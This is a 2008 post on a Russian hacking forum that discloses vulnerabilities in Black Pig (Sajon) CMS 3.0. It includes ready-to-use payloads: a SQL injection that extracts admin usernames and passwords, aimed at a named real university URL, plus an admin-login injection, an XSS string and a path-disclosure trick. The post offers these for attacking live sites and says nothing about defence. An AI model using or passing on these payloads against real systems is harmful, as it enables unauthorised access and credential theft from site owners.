Форум АНТИЧАТ - Уязвимости Sajon CMS 3.0

Уязвимости Black Pig (Sajon) CMS 3.0

26.12.2008, 22:08

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Уязвимости Black Pig (Sajon) CMS 3.0

Наткнулса исследуя Университет Кембриджа:
Данная CMS не очень распространена, однако на ней несколько ПИАРистых сайтов работают.

Sql-inj

1. Имя файла может меняться, но уязвим параметр key

PHP код:


		
			
http://www.enterprise.cam.ac.uk/archive.php?key=24+UNION+SELECT+username,password+FROM+cmscamenter.cms_users--

2. Скуля в админке, при авторизации

PHP код:


		
			
POST

formloginuser=%00'

XSS

PHP код:


		
			
http://www.site.com/cms/admin.php

POST

action=login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script>

Тоже самое в goid,gopage

Админка:

PHP код:


		
			
site.com/cms/

Раскрытие пути

PHP код:


		
			
http://www.site.com/cms/admin.php

в поле логина ставим ОДИНАРНУЮ КАВЫЧКУ

PHP код:


		
			
Table: cms_users

Fields: username,password

Author: The Black Pig Design Co Ltd
www.blackpig.co.uk

Сорцов нет;аплоад,судя по логам-есть, но я ненашел.

Последний раз редактировалось $n@ke; 26.12.2008 в 23:51.. Причина: да хрен его знает как называеться CMS =)

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

Reviews CMS

w3r3.w01f

PHP, PERL, MySQL, JavaScript

12.04.2010 23:18

CMS vs "изготовление на коленках"

vadim_samoilov

Чужие Статьи

19.08.2008 02:10

Веб 2.0 и Веб 3.0. Будущее Интернета.

SK | Heaton

Мировые новости

13.06.2007 02:07

Mozilla приступила к созданию Firefox 3.0

Dracula4ever

Мировые новости

31.10.2006 10:29

Девять Комерческих Cms

w3r3.w01f

PHP, PERL, MySQL, JavaScript

21.04.2006 00:27